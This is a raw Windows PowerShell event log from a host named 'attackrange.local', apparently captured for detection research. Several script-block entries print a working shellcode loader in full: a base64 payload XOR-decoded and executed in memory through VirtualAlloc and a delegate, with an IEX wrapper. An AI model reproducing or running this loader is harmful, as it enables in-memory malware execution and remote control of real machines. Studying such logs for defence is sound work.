Keywords=None
Message=Started invocation of ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476799
Keywords=None
Message=Completed invocation of ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476798
Keywords=None
Message=Started invocation of ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476797
Keywords=None
Message=Completed invocation of ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476796
Keywords=None
Message=Started invocation of ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476795
Keywords=None
Message=Completed invocation of ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476794
Keywords=None
Message=Started invocation of ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476793
Keywords=None
Message=Completed invocation of ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476792
Keywords=None
Message=Started invocation of ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476791
Keywords=None
Message=Completed invocation of ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476790
Keywords=None
Message=Started invocation of ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476789
Keywords=None
Message=Completed invocation of ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476788
Keywords=None
Message=Started invocation of ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476787
Keywords=None
Message=Completed invocation of ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476786
Keywords=None
Message=Started invocation of ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476785
Keywords=None
Message=Completed invocation of ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476784
Keywords=None
Message=Started invocation of ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476783
Keywords=None
Message=Completed invocation of ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476782
Keywords=None
Message=Started invocation of ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476781
Keywords=None
Message=Completed invocation of ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476780
Keywords=None
Message=Started invocation of ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476779
Keywords=None
Message=Completed invocation of ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476778
Keywords=None
Message=Started invocation of ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476777
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }

ScriptBlock ID: 18418b59-5c78-411e-81b6-350894ebb51d
Path:
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476776
Keywords=None
Message=Started invocation of ScriptBlock ID: a38ec8be-8dfd-4ad6-a78c-54b75f40f06e
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476775
Keywords=None
Message=Creating Scriptblock text (1 of 1):
function func_get_proc_address {
	Param ($var_module, $var_procedure)		
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

ScriptBlock ID: a38ec8be-8dfd-4ad6-a78c-54b75f40f06e
Path:
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476774
Keywords=None
Message=Started invocation of ScriptBlock ID: 4451d8c0-2665-4f9a-9459-a824389f5d57
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=3
Type=Warning
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476773
Keywords=None
Message=Creating Scriptblock text (1 of 1):
function func_get_proc_address {
	Param ($var_module, $var_procedure)		
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
		[Parameter(Position = 1)] [Type] $var_return_type = [Void]
	)

	$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
	$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

	return $var_type_builder.CreateType()
}

[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2yyMjIyMS3HR0dHR0Sxl1WoTc9sqHIyMjeBLqcnJJIHJyS5giIyNwc0t0qrzl3PZzyq8jIyN4EvFxSyMR46dxcXFwcXNLyHYNGNz2quWg4HNLoxAjI6rDSSdzSTx1S1ZlvaXc9nwS3HR0SdxwdUsOJTtY3Pam4yyn6SIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FYke3PKWNzc3BLcyrIiIyPK6iIjI8tM3NzcDHZFTxYjFmwCcwZjYnN4F39zeXsWFwtzfQoUYGAKFF4HZmpgYnEOcHdibWdicWcOYm13anVqcXZwDndmcHcOZWpvZgIHawhrCSMWbAJzBiN2UEZRDmJERk1XGQNuTFlKT09CDBcNEwMLQExOU0JXSkFPRhgDbnBqZgMbDRMYA3RKTUdMVFADbXcDFg0SGAN3UUpHRk1XDBcNExgDDW1mdwNgb3EDEQ0TDRYTFBEUCi4pIxZsAnMGY2JzeBd/c3l7FhcLc30KFGBgChReB2ZqYGJxDnB3Ym1nYnFnDmJtd2p1anF2cA53ZnB3DmVqb2YCB2sIawkjFmwCcwZjYnN4F39zeXsWFwtzfQoUYGAKFF4HZmpgYnEOcHdibWdicWcOYm13anVqcXZwDndmcHcOZWpvZgIHawhrCSMWbAJzBmNic3gXf3N5exYXC3N9ChRgYAoUXgdmamBicQ5wd2JtZ2JxZw5ibXdqdWpxdnAOd2Zwdw5lam9mAgdrCGsJIxYjS9OWgXXc9kljSyMzIyNLIyNjI3RLe4dwxtz2sJojIyMjIvpycKrEdEsjAyMjcHVLMbWqwdz2puNX5agkIuCm41bGe+DLqt7c3E5GUUBLQk1HSllGDUBCV0lCTkVGUFcNQExOIyMjIyM=')

for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)

ScriptBlock ID: 4451d8c0-2665-4f9a-9459-a824389f5d57
Path:
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476772
Keywords=None
Message=Started invocation of ScriptBlock ID: 3b70575f-e6d7-4254-ab01-b8d22e2ba8f5
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=3
Type=Warning
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476771
Keywords=None
Message=Creating Scriptblock text (1 of 1):
Set-StrictMode -Version 2

$DoIt = @'
function func_get_proc_address {
	Param ($var_module, $var_procedure)		
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
		[Parameter(Position = 1)] [Type] $var_return_type = [Void]
	)

	$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
	$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

	return $var_type_builder.CreateType()
}

[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2yyMjIyMS3HR0dHR0Sxl1WoTc9sqHIyMjeBLqcnJJIHJyS5giIyNwc0t0qrzl3PZzyq8jIyN4EvFxSyMR46dxcXFwcXNLyHYNGNz2quWg4HNLoxAjI6rDSSdzSTx1S1ZlvaXc9nwS3HR0SdxwdUsOJTtY3Pam4yyn6SIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FYke3PKWNzc3BLcyrIiIyPK6iIjI8tM3NzcDHZFTxYjFmwCcwZjYnN4F39zeXsWFwtzfQoUYGAKFF4HZmpgYnEOcHdibWdicWcOYm13anVqcXZwDndmcHcOZWpvZgIHawhrCSMWbAJzBiN2UEZRDmJERk1XGQNuTFlKT09CDBcNEwMLQExOU0JXSkFPRhgDbnBqZgMbDRMYA3RKTUdMVFADbXcDFg0SGAN3UUpHRk1XDBcNExgDDW1mdwNgb3EDEQ0TDRYTFBEUCi4pIxZsAnMGY2JzeBd/c3l7FhcLc30KFGBgChReB2ZqYGJxDnB3Ym1nYnFnDmJtd2p1anF2cA53ZnB3DmVqb2YCB2sIawkjFmwCcwZjYnN4F39zeXsWFwtzfQoUYGAKFF4HZmpgYnEOcHdibWdicWcOYm13anVqcXZwDndmcHcOZWpvZgIHawhrCSMWbAJzBmNic3gXf3N5exYXC3N9ChRgYAoUXgdmamBicQ5wd2JtZ2JxZw5ibXdqdWpxdnAOd2Zwdw5lam9mAgdrCGsJIxYjS9OWgXXc9kljSyMzIyNLIyNjI3RLe4dwxtz2sJojIyMjIvpycKrEdEsjAyMjcHVLMbWqwdz2puNX5agkIuCm41bGe+DLqt7c3E5GUUBLQk1HSllGDUBCV0lCTkVGUFcNQExOIyMjIyM=')

for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
	start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
	IEX $DoIt
}


ScriptBlock ID: 3b70575f-e6d7-4254-ab01-b8d22e2ba8f5
Path:
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476770
Keywords=None
Message=Completed invocation of ScriptBlock ID: 906b8333-be13-44f1-928d-991aa459fc78
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476769
Keywords=None
Message=Started invocation of ScriptBlock ID: 906b8333-be13-44f1-928d-991aa459fc78
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476768
Keywords=None
Message=Completed invocation of ScriptBlock ID: 7465f6b1-b80f-432a-8345-485eaeaf3dff
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476767
Keywords=None
Message=Started invocation of ScriptBlock ID: 7465f6b1-b80f-432a-8345-485eaeaf3dff
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476766
Keywords=None
Message=Started invocation of ScriptBlock ID: cb4d3c2c-97a4-424a-a8af-642d18d57d76
Runspace ID: c4dc56d8-21c8-4934-85e4-cd2ee858effe
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=3
Type=Warning
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476765
Keywords=None
Message=Creating Scriptblock text (1 of 1):
